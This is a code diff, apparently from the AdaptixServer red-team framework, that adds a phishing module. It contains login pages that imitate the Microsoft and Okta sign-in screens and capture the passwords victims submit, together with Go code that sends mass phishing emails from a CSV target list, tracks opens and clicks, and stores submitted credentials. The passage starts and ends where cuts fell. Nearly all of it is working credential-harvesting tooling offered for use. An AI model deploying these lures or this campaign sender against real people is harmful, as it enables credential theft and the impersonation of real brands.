+<div class="email-chip"><span>{{.Email}}</span></div>
+</div>
+
+<form method="POST" action="{{.SubmitURL}}">
+<input type="hidden" name="email" value="{{.Email}}">
+
+<div class="form-group">
+<input type="password" name="password" placeholder=" " required autofocus id="pass">
+<label class="float-label" for="pass">Enter your password</label>
+</div>
+
+<div class="links">
+<a href="#">Forgot password?</a>
+</div>
+
+<div class="actions">
+<a href="#">Create account</a>
+<button type="submit" class="submit-btn">Next</button>
+</div>
+</form>
+
+<div class="footer">
+<a href="#">Help</a>
+<a href="#">Privacy</a>
+<a href="#">Terms</a>
+</div>
+</div>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/landers/microsoft_login.html
+++ b/AdaptixServer/extenders/phishing_service/landers/microsoft_login.html
@@ -1,0 +1,77 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Sign in to your account</title>
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+body{font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background-color:#f2f2f2;display:flex;justify-content:center;align-items:center;min-height:100vh}
+.container{display:flex;flex-direction:column;align-items:center}
+.login-box{background:#fff;padding:44px;width:440px;box-shadow:0 2px 6px rgba(0,0,0,0.2)}
+.ms-logo{margin-bottom:16px}
+.ms-logo svg{width:108px;height:24px}
+h2{font-size:24px;font-weight:300;color:#1b1b1b;margin-bottom:4px}
+.email-display{font-size:13px;color:#1b1b1b;margin-bottom:20px;padding:4px 0;display:flex;align-items:center}
+.email-display .avatar{width:24px;height:24px;background:#0078d4;border-radius:50%;color:#fff;display:inline-flex;align-items:center;justify-content:center;font-size:11px;font-weight:600;margin-right:8px}
+.form-group{margin-bottom:16px}
+label{display:block;font-size:13px;color:#1b1b1b;margin-bottom:4px}
+input[type="password"],input[type="text"]{width:100%;padding:6px 10px;font-size:15px;border:none;border-bottom:1px solid #767676;outline:none;font-family:inherit;background:transparent}
+input:focus{border-bottom:2px solid #0078d4}
+.submit-btn{width:100%;padding:8px;background-color:#0067b8;color:#fff;border:none;font-size:15px;font-weight:600;cursor:pointer;margin-top:24px}
+.submit-btn:hover{background-color:#005da6}
+.links{margin-top:12px}
+.links a{color:#0067b8;text-decoration:none;font-size:13px}
+.links a:hover{text-decoration:underline;color:#005da6}
+.footer{margin-top:24px;font-size:12px;color:#6e6e6e}
+.keep-signed{margin-top:16px;display:flex;align-items:center;font-size:13px}
+.keep-signed input{margin-right:8px}
+</style>
+</head>
+<body>
+<div class="container">
+<div class="login-box">
+<!-- Microsoft Logo -->
+<div class="ms-logo">
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 108 24">
+<path fill="#737373" d="M44.836 4.6v14.8h-2.271V7.583L38.202 19.4h-1.2l-4.47-11.817V19.4h-2.07V4.6h2.924l4.188 11.265L41.912 4.6h2.924zm3.092 1.7a1.27 1.27 0 01-.94-.38 1.253 1.253 0 010-1.856 1.27 1.27 0 01.94-.38 1.288 1.288 0 01.947.38 1.253 1.253 0 010 1.856 1.288 1.288 0 01-.947.38zm-1.078 13.1V8.5h2.17v10.9h-2.17zm8.84-11.15a4.847 4.847 0 012.18.479v2.1a3.574 3.574 0 00-2.024-.669 3.074 3.074 0 00-2.381 1.04 3.788 3.788 0 00-.941 2.661 3.63 3.63 0 00.9 2.558 3.035 3.035 0 002.317.989 3.776 3.776 0 002.13-.669v2.1a4.847 4.847 0 01-2.38.569 4.9 4.9 0 01-3.67-1.48 5.2 5.2 0 01-1.44-3.787 5.6 5.6 0 011.52-4.027 5.1 5.1 0 013.789-1.534v-.33zm5.11 0h.1v2.1a3.464 3.464 0 011.3-1.7 3.084 3.084 0 011.75-.5 2.6 2.6 0 01.68.08v2.171a2.972 2.972 0 00-1.1-.2 2.58 2.58 0 00-2.05 1.05 4.257 4.257 0 00-.85 2.79V19.4h-2.17V8.5h2.17v.75h.17zm5.35 5.55a5.557 5.557 0 011.47-4 5.063 5.063 0 013.787-1.55 4.787 4.787 0 013.587 1.42 5.1 5.1 0 011.38 3.717 5.48 5.48 0 01-1.47 3.937 5.03 5.03 0 01-3.787 1.555 4.89 4.89 0 01-3.537-1.378 5.007 5.007 0 01-1.43-3.701zm2.24.12a3.88 3.88 0 00.85 2.63 2.84 2.84 0 002.217.979 2.71 2.71 0 002.137-.94 3.78 3.78 0 00.83-2.6 3.83 3.83 0 00-.85-2.631 2.78 2.78 0 00-2.167-.979 2.793 2.793 0 00-2.18.959 3.69 3.69 0 00-.837 2.582zm14.15-3.22l-.04.08a2.508 2.508 0 00-1.13-.25 2.277 2.277 0 00-1.89 1.079 4.687 4.687 0 00-.77 2.821v5.07h-2.17V8.5h2.17v1.4a3.292 3.292 0 013.07-1.65 2.227 2.227 0 01.83.15l-.07 2.3zm2.77-.95a5.557 5.557 0 011.47-4 5.063 5.063 0 013.787-1.55 4.787 4.787 0 013.587 1.42 5.1 5.1 0 011.38 3.717 5.48 5.48 0 01-1.47 3.937 5.03 5.03 0 01-3.787 1.555 4.89 4.89 0 01-3.537-1.378 5.007 5.007 0 01-1.43-3.701zm2.24.12a3.88 3.88 0 00.85 2.63 2.84 2.84 0 002.217.979 2.71 2.71 0 002.137-.94 3.78 3.78 0 00.83-2.6 3.83 3.83 0 00-.85-2.631 2.78 2.78 0 00-2.167-.979 2.793 2.793 0 00-2.18.959 3.69 3.69 0 00-.837 2.582zm13.03-3.77a2.3 2.3 0 011.72.7l-.04-2.2V4.6h2.17V19.4h-2.17v-.9a3.36 3.36 0 01-2.81 1.15 3.9 3.9 0 01-3.05-1.43 5.322 5.322 0 01-1.24-3.621 5.7 5.7 0 011.32-3.857 4.063 4.063 0 013.1-1.542zm.39 1.85a2.6 2.6 0 00-2.09 1 3.88 3.88 0 00-.81 2.58 3.7 3.7 0 00.81 2.49 2.63 2.63 0 002.09.97 2.67 2.67 0 002.13-.98 3.75 3.75 0 00.83-2.53 3.85 3.85 0 00-.81-2.55 2.59 2.59 0 00-2.05-.98z"/>
+<path fill="#f25022" d="M0 0h11v11H0z"/>
+<path fill="#7fba00" d="M12 0h11v11H12z"/>
+<path fill="#00a4ef" d="M0 12h11v11H0z"/>
+<path fill="#ffb900" d="M12 12h11v11H12z"/>
+</svg>
+</div>
+
+<h2>Sign in</h2>
+
+<div class="email-display">
+<span class="avatar">{{.FirstName}}</span>
+{{.Email}}
+</div>
+
+<form method="POST" action="{{.SubmitURL}}">
+<input type="hidden" name="email" value="{{.Email}}">
+
+<div class="form-group">
+<input type="password" name="password" placeholder="Password" required autofocus>
+</div>
+
+<div class="links">
+<a href="#">Forgot my password</a>
+</div>
+
+<button type="submit" class="submit-btn">Sign in</button>
+</form>
+
+<div class="keep-signed">
+<input type="checkbox" id="kmsi" checked>
+<label for="kmsi" style="font-size:13px;color:#1b1b1b;">Keep me signed in</label>
+</div>
+</div>
+<div class="footer">
+<a href="#" style="color:#6e6e6e;text-decoration:none;font-size:12px;">Terms of use</a> &nbsp;
+<a href="#" style="color:#6e6e6e;text-decoration:none;font-size:12px;">Privacy & cookies</a>
+</div>
+</div>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/landers/okta_login.html
+++ b/AdaptixServer/extenders/phishing_service/landers/okta_login.html
@@ -1,0 +1,76 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Sign In</title>
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,Oxygen,Ubuntu,sans-serif;background-color:#f4f5f7;display:flex;justify-content:center;align-items:center;min-height:100vh}
+.outer{text-align:center}
+.logo{margin-bottom:32px}
+.logo h1{font-size:28px;font-weight:700;color:#1662dd}
+.logo p{font-size:14px;color:#6e6e78;margin-top:4px}
+.login-box{background:#fff;padding:40px;width:400px;border-radius:6px;box-shadow:0 2px 8px rgba(0,0,0,0.08);text-align:left}
+h2{font-size:20px;font-weight:500;color:#1d1d21;margin-bottom:24px}
+.form-group{margin-bottom:20px}
+.form-group label{display:block;font-size:14px;font-weight:500;color:#1d1d21;margin-bottom:6px}
+.form-group input{width:100%;padding:10px 12px;font-size:14px;border:1px solid #c7c7d1;border-radius:4px;outline:none;font-family:inherit;transition:border 0.2s}
+.form-group input:focus{border-color:#1662dd;box-shadow:0 0 0 1px #1662dd}
+.form-group input.prefilled{background:#f4f5f7;color:#6e6e78}
+.remember{display:flex;align-items:center;margin-bottom:24px;font-size:14px;color:#6e6e78}
+.remember input{margin-right:8px}
+.submit-btn{width:100%;padding:12px;background-color:#1662dd;color:#fff;border:none;font-size:16px;font-weight:500;border-radius:4px;cursor:pointer;font-family:inherit}
+.submit-btn:hover{background-color:#1456c0}
+.links{text-align:center;margin-top:20px}
+.links a{color:#1662dd;text-decoration:none;font-size:13px}
+.links a:hover{text-decoration:underline}
+.help-links{margin-top:20px;text-align:center;font-size:13px;color:#6e6e78}
+.help-links a{color:#6e6e78;text-decoration:none}
+.help-links a:hover{color:#1662dd}
+.footer{margin-top:24px;font-size:12px;color:#a7a7b3}
+</style>
+</head>
+<body>
+<div class="outer">
+<div class="logo">
+<h1>{{.Company}}</h1>
+<p>Powered by Okta</p>
+</div>
+
+<div class="login-box">
+<h2>Sign In</h2>
+
+<form method="POST" action="{{.SubmitURL}}">
+<div class="form-group">
+<label for="username">Username</label>
+<input type="text" id="username" name="email" value="{{.Email}}" class="prefilled" readonly>
+</div>
+
+<div class="form-group">
+<label for="password">Password</label>
+<input type="password" id="password" name="password" placeholder="Enter your password" required autofocus>
+</div>
+
+<div class="remember">
+<input type="checkbox" id="remember" checked>
+<label for="remember">Remember me</label>
+</div>
+
+<button type="submit" class="submit-btn">Sign In</button>
+</form>
+
+<div class="links">
+<a href="#">Need help signing in?</a>
+</div>
+</div>
+
+<div class="help-links">
+<a href="#">Help</a> &bull;
+<a href="#">Privacy Policy</a> &bull;
+<a href="#">Terms of Service</a>
+</div>
+<div class="footer">&copy; 2024 {{.Company}}. All rights reserved.</div>
+</div>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/pl_campaign.go
+++ b/AdaptixServer/extenders/phishing_service/pl_campaign.go
@@ -1,0 +1,643 @@
+package main
+
+import (
+	"bytes"
+	"crypto/tls"
+	"encoding/json"
+	"fmt"
+	"math/rand"
+	"net/smtp"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+)
+
+// ============================================================================
+// Call Handlers
+// ============================================================================
+
+func (s *PhishingService) HandleCampaignCreate(operator string, args string) {
+	var c Campaign
+	if err := json.Unmarshal([]byte(args), &c); err != nil {
+		s.sendError(operator, "Invalid campaign data: "+err.Error())
+		return
+	}
+
+	c.ID = generateID()
+	c.Status = "draft"
+	c.CreatedAt = nowUnix()
+	c.CreatedBy = operator
+
+	if c.RedirectURL == "" {
+		c.RedirectURL = "https://login.microsoftonline.com"
+	}
+	if c.SendDelay == 0 {
+		c.SendDelay = 3
+	}
+
+	if err := s.SaveCampaign(c); err != nil {
+		s.sendError(operator, "Failed to save campaign: "+err.Error())
+		return
+	}
+
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignList(operator string) {
+	s.sendResponseClient(operator, "campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignDelete(operator string, args string) {
+	var req struct {
+		ID string `json:"id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	s.mu.Lock()
+	if ch, ok := s.stopChans[req.ID]; ok {
+		close(ch)
+		delete(s.stopChans, req.ID)
+	}
+	s.mu.Unlock()
+
+	s.DeleteCampaign(req.ID)
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignStart(operator string, args string) {
+	var req struct {
+		ID string `json:"id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	campaign, err := s.LoadCampaign(req.ID)
+	if err != nil {
+		s.sendError(operator, "Campaign not found")
+		return
+	}
+
+	if campaign.Status == "running" {
+		s.sendError(operator, "Campaign is already running")
+		return
+	}
+
+	targets := s.LoadTargets(campaign.ID)
+	if len(targets) == 0 {
+		s.sendError(operator, "No targets for this campaign")
+		return
+	}
+
+	campaign.Status = "running"
+	s.SaveCampaign(campaign)
+
+	stopChan := make(chan struct{})
+	s.mu.Lock()
+	s.stopChans[campaign.ID] = stopChan
+	s.mu.Unlock()
+
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+
+	go s.SendCampaign(operator, campaign, targets, stopChan)
+}
+
+func (s *PhishingService) HandleCampaignStop(operator string, args string) {
+	var req struct {
+		ID string `json:"id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	s.mu.Lock()
+	if ch, ok := s.stopChans[req.ID]; ok {
+		close(ch)
+		delete(s.stopChans, req.ID)
+	}
+	s.mu.Unlock()
+
+	campaign, err := s.LoadCampaign(req.ID)
+	if err != nil {
+		return
+	}
+	campaign.Status = "paused"
+	s.SaveCampaign(campaign)
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleTargetsImport(operator string, args string) {
+	var req struct {
+		CampaignID string `json:"campaign_id"`
+		CSV        string `json:"csv"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	existing := s.LoadTargets(req.CampaignID)
+	newTargets := parseCSV(req.CSV, req.CampaignID)
+
+	combined := append(existing, newTargets...)
+	if err := s.SaveTargets(req.CampaignID, combined); err != nil {
+		s.sendError(operator, "Failed to save targets: "+err.Error())
+		return
+	}
+
+	s.sendResponseAll("targets", map[string]interface{}{
+		"campaign_id": req.CampaignID,
+		"targets":     combined,
+	})
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleTargetsList(operator string, args string) {
+	var req struct {
+		CampaignID string `json:"campaign_id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	targets := s.LoadTargets(req.CampaignID)
+	s.sendResponseClient(operator, "targets", map[string]interface{}{
+		"campaign_id": req.CampaignID,
+		"targets":     targets,
+	})
+}
+
+func (s *PhishingService) HandleTargetsDelete(operator string, args string) {
+	var req struct {
+		CampaignID string   `json:"campaign_id"`
+		IDs        []string `json:"ids"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	targets := s.LoadTargets(req.CampaignID)
+	idSet := make(map[string]bool)
+	for _, id := range req.IDs {
+		idSet[id] = true
+	}
+
+	var filtered []Target
+	for _, t := range targets {
+		if !idSet[t.ID] {
+			filtered = append(filtered, t)
+		}
+	}
+
+	s.SaveTargets(req.CampaignID, filtered)
+	s.sendResponseAll("targets", map[string]interface{}{
+		"campaign_id": req.CampaignID,
+		"targets":     filtered,
+	})
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleResultsList(operator string, args string) {
+	var req struct {
+		CampaignID string `json:"campaign_id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	results := s.LoadResults(req.CampaignID)
+	s.sendResponseClient(operator, "results", map[string]interface{}{
+		"campaign_id": req.CampaignID,
+		"results":     results,
+	})
+}
+
+func (s *PhishingService) HandleResultsExport(operator string, args string) {
+	var req struct {
+		CampaignID string `json:"campaign_id"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid request")
+		return
+	}
+
+	results := s.LoadResults(req.CampaignID)
+	csv := resultsToCSV(results)
+	s.sendResponseClient(operator, "export", map[string]interface{}{
+		"campaign_id": req.CampaignID,
+		"csv":         csv,
+	})
+}
+
+func (s *PhishingService) HandleTemplatesList(operator string) {
+	templates := s.listFiles("templates")
+	s.sendResponseClient(operator, "templates", templates)
+}
+
+func (s *PhishingService) HandleLandersList(operator string) {
+	landers := s.listFiles("landers")
+	s.sendResponseClient(operator, "landers", landers)
+}
+
+func (s *PhishingService) HandleTemplatePreview(operator string, args string) {
+	var req struct {
+		Type string `json:"type"` // "template" or "lander"
+		Name string `json:"name"`
+	}
+	if err := json.Unmarshal([]byte(args), &req); err != nil {
+		s.sendError(operator, "Invalid preview request")
+		return
+	}
+
+	var html string
+	if req.Type == "lander" {
+		html = s.loadLander(req.Name)
+	} else {
+		html = s.loadTemplate(req.Name)
+	}
+
+	if html == "" {
+		s.sendError(operator, "Template not found: "+req.Name)
+		return
+	}
+
+	// Replace template variables with example values
+	replacer := strings.NewReplacer(
+		"{{.FirstName}}", "John",
+		"{{.LastName}}", "Doe",
+		"{{.Email}}", "john.doe@contoso.com",
+		"{{.Company}}", "Contoso Ltd",
+		"{{.Position}}", "IT Manager",
+		"{{.ClickURL}}", "#",
+		"{{.TrackingURL}}", "#",
+		"{{.SubmitURL}}", "#",
+		"{{.Custom}}", "",
+	)
+	html = replacer.Replace(html)
+
+	resp := map[string]interface{}{
+		"preview_type": req.Type,
+		"name":         req.Name,
+		"html":         html,
+	}
+	s.sendResponseClient(operator, "preview", resp)
+}
+
+// ============================================================================
+// Campaign Sending
+// ============================================================================
+
+func (s *PhishingService) SendCampaign(operator string, campaign Campaign, targets []Target, stopChan chan struct{}) {
+	templateContent := s.loadTemplate(campaign.Template)
+	if templateContent == "" {
+		s.sendError(operator, "Failed to load email template: "+campaign.Template)
+		campaign.Status = "draft"
+		s.SaveCampaign(campaign)
+		s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+		return
+	}
+
+	results := s.LoadResults(campaign.ID)
+	sentIDs := make(map[string]bool)
+	for _, r := range results {
+		sentIDs[r.TargetID] = true
+	}
+
+	for _, target := range targets {
+		select {
+		case <-stopChan:
+			campaign.Status = "paused"
+			s.SaveCampaign(campaign)
+			s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+			return
+		default:
+		}
+
+		if sentIDs[target.ID] {
+			continue
+		}
+
+		trackingID := generateTrackingID()
+		result := Result{
+			ID:         trackingID,
+			CampaignID: campaign.ID,
+			TargetID:   target.ID,
+			Email:      target.Email,
+			FirstName:  target.FirstName,
+			LastName:   target.LastName,
+			Status:     "sending",
+		}
+
+		body := renderEmailTemplate(templateContent, campaign, target, trackingID)
+
+		err := sendEmail(campaign, target, body)
+		if err != nil {
+			result.Status = "error"
+			result.Error = err.Error()
+		} else {
+			result.Status = "sent"
+			result.SentAt = nowUnix()
+		}
+
+		results = append(results, result)
+		s.SaveResults(campaign.ID, results)
+
+		s.sendEvent("email_sent", result)
+
+		delay := campaign.SendDelay
+		if delay > 0 {
+			jitter := rand.Intn(delay/2+1) - delay/4
+			time.Sleep(time.Duration(delay+jitter) * time.Second)
+		}
+	}
+
+	campaign.Status = "completed"
+	s.SaveCampaign(campaign)
+	s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+// ============================================================================
+// SMTP
+// ============================================================================
+
+func sendEmail(campaign Campaign, target Target, htmlBody string) error {
+	from := campaign.SenderEmail
+	to := target.Email
+
+	headers := make(map[string]string)
+	headers["From"] = fmt.Sprintf("%s <%s>", campaign.SenderName, from)
+	headers["To"] = to
+	headers["Subject"] = renderSubject(campaign.Subject, target)
+	headers["MIME-Version"] = "1.0"
+	headers["Content-Type"] = "text/html; charset=UTF-8"
+
+	var msg bytes.Buffer
+	for k, v := range headers {
+		msg.WriteString(fmt.Sprintf("%s: %s\r\n", k, v))
+	}
+	msg.WriteString("\r\n")
+	msg.WriteString(htmlBody)
+
+	addr := fmt.Sprintf("%s:%d", campaign.SmtpHost, campaign.SmtpPort)
+
+	if campaign.SmtpTLS {
+		return sendEmailTLS(addr, campaign.SmtpUser, campaign.SmtpPass, from, to, msg.Bytes())
+	}
+
+	var auth smtp.Auth
+	if campaign.SmtpUser != "" {
+		auth = smtp.PlainAuth("", campaign.SmtpUser, campaign.SmtpPass, campaign.SmtpHost)
+	}
+
+	return smtp.SendMail(addr, auth, from, []string{to}, msg.Bytes())
+}
+
+func sendEmailTLS(addr string, user string, pass string, from string, to string, msg []byte) error {
+	host := strings.Split(addr, ":")[0]
+
+	tlsConfig := &tls.Config{
+		ServerName: host,
+	}
+
+	conn, err := tls.Dial("tcp", addr, tlsConfig)
+	if err != nil {
+		return err
+	}
+
+	client, err := smtp.NewClient(conn, host)
+	if err != nil {
+		return err
+	}
+	defer client.Close()
+
+	if user != "" {
+		auth := smtp.PlainAuth("", user, pass, host)
+		if err = client.Auth(auth); err != nil {
+			return err
+		}
+	}
+
+	if err = client.Mail(from); err != nil {
+		return err
+	}
+	if err = client.Rcpt(to); err != nil {
+		return err
+	}
+
+	w, err := client.Data()
+	if err != nil {
+		return err
+	}
+	w.Write(msg)
+	w.Close()
+
+	return client.Quit()
+}
+
+// ============================================================================
+// Template Rendering
+// ============================================================================
+
+func renderEmailTemplate(template string, campaign Campaign, target Target, trackingID string) string {
+	baseURL := strings.TrimRight(campaign.BaseURL, "/")
+
+	trackingURL := fmt.Sprintf("%s/px/%s.png", baseURL, trackingID)
+	clickURL := fmt.Sprintf("%s/cl/%s", baseURL, trackingID)
+	landerURL := fmt.Sprintf("%s/lp/%s", baseURL, trackingID)
+
+	r := strings.NewReplacer(
+		"{{.FirstName}}", target.FirstName,
+		"{{.LastName}}", target.LastName,
+		"{{.Email}}", target.Email,
+		"{{.Company}}", target.Company,
+		"{{.Position}}", target.Position,
+		"{{.Custom}}", target.Custom,
+		"{{.TrackingURL}}", trackingURL,
+		"{{.ClickURL}}", clickURL,
+		"{{.LanderURL}}", landerURL,
+		"{{.Subject}}", campaign.Subject,
+		"{{.SenderName}}", campaign.SenderName,
+		"{{.SenderEmail}}", campaign.SenderEmail,
+	)
+	body := r.Replace(template)
+
+	if campaign.TrackOpens && !strings.Contains(body, trackingURL) {
+		pixel := fmt.Sprintf(`<img src="%s" width="1" height="1" style="display:none" alt="">`, trackingURL)
+		if idx := strings.LastIndex(body, "</body>"); idx >= 0 {
+			body = body[:idx] + pixel + body[idx:]
+		} else {
+			body += pixel
+		}
+	}
+
+	return body
+}
+
+func renderSubject(subject string, target Target) string {
+	r := strings.NewReplacer(
+		"{{.FirstName}}", target.FirstName,
+		"{{.LastName}}", target.LastName,
+		"{{.Email}}", target.Email,
+		"{{.Company}}", target.Company,
+		"{{.Position}}", target.Position,
+	)
+	return r.Replace(subject)
+}
+
+// ============================================================================
+// CSV Parsing
+// ============================================================================
+
+func parseCSV(csvData string, campaignID string) []Target {
+	var targets []Target
+	lines := strings.Split(strings.TrimSpace(csvData), "\n")
+	if len(lines) < 2 {
+		return targets
+	}
+
+	header := strings.Split(strings.TrimSpace(lines[0]), ",")
+	colMap := make(map[string]int)
+	for i, h := range header {
+		colMap[strings.ToLower(strings.TrimSpace(h))] = i
+	}
+
+	for _, line := range lines[1:] {
+		line = strings.TrimSpace(line)
+		if line == "" {
+			continue
+		}
+		cols := strings.Split(line, ",")
+
+		t := Target{
+			ID:         generateID(),
+			CampaignID: campaignID,
+		}
+
+		if idx, ok := colMap["email"]; ok && idx < len(cols) {
+			t.Email = strings.TrimSpace(cols[idx])
+		}
+		if idx, ok := colMap["first_name"]; ok && idx < len(cols) {
+			t.FirstName = strings.TrimSpace(cols[idx])
+		} else if idx, ok := colMap["firstname"]; ok && idx < len(cols) {
+			t.FirstName = strings.TrimSpace(cols[idx])
+		}
+		if idx, ok := colMap["last_name"]; ok && idx < len(cols) {
+			t.LastName = strings.TrimSpace(cols[idx])
+		} else if idx, ok := colMap["lastname"]; ok && idx < len(cols) {
+			t.LastName = strings.TrimSpace(cols[idx])
+		}
+		if idx, ok := colMap["position"]; ok && idx < len(cols) {
+			t.Position = strings.TrimSpace(cols[idx])
+		}
+		if idx, ok := colMap["company"]; ok && idx < len(cols) {
+			t.Company = strings.TrimSpace(cols[idx])
+		}
+		if idx, ok := colMap["custom"]; ok && idx < len(cols) {
+			t.Custom = strings.TrimSpace(cols[idx])
+		}
+
+		if t.Email != "" {
+			targets = append(targets, t)
+		}
+	}
+
+	return targets
+}
+
+func resultsToCSV(results []Result) string {
+	var buf bytes.Buffer
+	buf.WriteString("email,first_name,last_name,status,sent_at,opened_at,clicked_at,submit_at,remote_ip,user_agent,submit_data\n")
+	for _, r := range results {
+		buf.WriteString(fmt.Sprintf("%s,%s,%s,%s,%d,%d,%d,%d,%s,%s,%s\n",
+			r.Email, r.FirstName, r.LastName, r.Status,
+			r.SentAt, r.OpenedAt, r.ClickedAt, r.SubmitAt,
+			r.RemoteIP, r.UserAgent, r.SubmitData,
+		))
+	}
+	return buf.String()
+}
+
+// ============================================================================
+// File Helpers
+// ============================================================================
+
+func (s *PhishingService) loadTemplate(name string) string {
+	path := filepath.Join(s.moduleDir, "templates", name)
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return ""
+	}
+	return string(data)
+}
+
+func (s *PhishingService) loadLander(name string) string {
+	path := filepath.Join(s.moduleDir, "landers", name)
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return ""
+	}
+	return string(data)
+}
+
+func (s *PhishingService) listFiles(subdir string) []string {
+	var files []string
+	dir := filepath.Join(s.moduleDir, subdir)
+	entries, err := os.ReadDir(dir)
+	if err != nil {
+		return files
+	}
+	for _, e := range entries {
+		if !e.IsDir() && strings.HasSuffix(e.Name(), ".html") {
+			files = append(files, e.Name())
+		}
+	}
+	return files
+}
+
+// ListCampaignsWithStats returns all campaigns enriched with their stats.
+func (s *PhishingService) ListCampaignsWithStats() []map[string]interface{} {
+	campaigns := s.ListCampaigns()
+	var result []map[string]interface{}
+	for _, c := range campaigns {
+		stats := s.GetCampaignStats(c.ID)
+		entry := map[string]interface{}{
+			"id":            c.ID,
+			"name":          c.Name,
+			"status":        c.Status,
+			"smtp_host":     c.SmtpHost,
+			"smtp_port":     c.SmtpPort,
+			"smtp_user":     c.SmtpUser,
+			"smtp_pass":     c.SmtpPass,
+			"smtp_tls":      c.SmtpTLS,
+			"sender_email":  c.SenderEmail,
+			"sender_name":   c.SenderName,
+			"subject":       c.Subject,
+			"template":      c.Template,
+			"lander":        c.Lander,
+			"track_opens":   c.TrackOpens,
+			"track_clicks":  c.TrackClicks,
+			"base_url":      c.BaseURL,
+			"redirect_url":  c.RedirectURL,
+			"send_delay":    c.SendDelay,
+			"created_at":    c.CreatedAt,
+			"created_by":    c.CreatedBy,
+			"total_targets": stats.TotalTargets,
+			"sent":          stats.Sent,
+			"opened":        stats.Opened,
+			"clicked":       stats.Clicked,
+			"submitted":     stats.Submitted,
+			"errors":        stats.Errors,
+		}
+		result = append(result, entry)
+	}
+	return result
+}

--- a/AdaptixServer/extenders/phishing_service/pl_data.go
+++ b/AdaptixServer/extenders/phishing_service/pl_data.go
@@ -1,0 +1,261 @@
+package main
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"encoding/json"
+	"fmt"
+	"strings"
+	"time"
+)
+
+// ============================================================================
+// Data Models
+// ============================================================================
+
+type Campaign struct {
+	ID          string `json:"id"`
+	Name        string `json:"name"`
+	Status      string `json:"status"` // draft, running, paused, completed
+	SmtpHost    string `json:"smtp_host"`
+	SmtpPort    int    `json:"smtp_port"`
+	SmtpUser    string `json:"smtp_user"`
+	SmtpPass    string `json:"smtp_pass"`
+	SmtpTLS     bool   `json:"smtp_tls"`
+	SenderEmail string `json:"sender_email"`
+	SenderName  string `json:"sender_name"`
+	Subject     string `json:"subject"`
+	Template    string `json:"template"`
+	Lander      string `json:"lander"`
+	TrackOpens  bool   `json:"track_opens"`
+	TrackClicks bool   `json:"track_clicks"`
+	BaseURL     string `json:"base_url"`
+	RedirectURL string `json:"redirect_url"`
+	SendDelay   int    `json:"send_delay"` // seconds between emails
+	CreatedAt   int64  `json:"created_at"`
+	CreatedBy   string `json:"created_by"`
+}
+
+type Target struct {
+	ID         string `json:"id"`
+	CampaignID string `json:"campaign_id"`
+	Email      string `json:"email"`
+	FirstName  string `json:"first_name"`
+	LastName   string `json:"last_name"`
+	Position   string `json:"position"`
+	Company    string `json:"company"`
+	Custom     string `json:"custom"`
+}
+
+type Result struct {
+	ID         string `json:"id"`
+	CampaignID string `json:"campaign_id"`
+	TargetID   string `json:"target_id"`
+	Email      string `json:"email"`
+	FirstName  string `json:"first_name"`
+	LastName   string `json:"last_name"`
+	Status     string `json:"status"` // sent, delivered, opened, clicked, submitted, error
+	SentAt     int64  `json:"sent_at"`
+	OpenedAt   int64  `json:"opened_at"`
+	ClickedAt  int64  `json:"clicked_at"`
+	SubmitAt   int64  `json:"submit_at"`
+	UserAgent  string `json:"user_agent"`
+	RemoteIP   string `json:"remote_ip"`
+	SubmitData string `json:"submit_data"`
+	Error      string `json:"error"`
+}
+
+// ============================================================================
+// ID Generation
+// ============================================================================
+
+func generateID() string {
+	b := make([]byte, 16)
+	rand.Read(b)
+	return hex.EncodeToString(b)
+}
+
+func generateTrackingID() string {
+	b := make([]byte, 12)
+	rand.Read(b)
+	return hex.EncodeToString(b)
+}
+
+// ============================================================================
+// Campaign CRUD
+// ============================================================================
+
+func (s *PhishingService) SaveCampaign(c Campaign) error {
+	data, err := json.Marshal(c)
+	if err != nil {
+		return err
+	}
+	return s.ts.TsExtenderDataSave(ExtenderName, "campaign:"+c.ID, data)
+}
+
+func (s *PhishingService) LoadCampaign(id string) (Campaign, error) {
+	var c Campaign
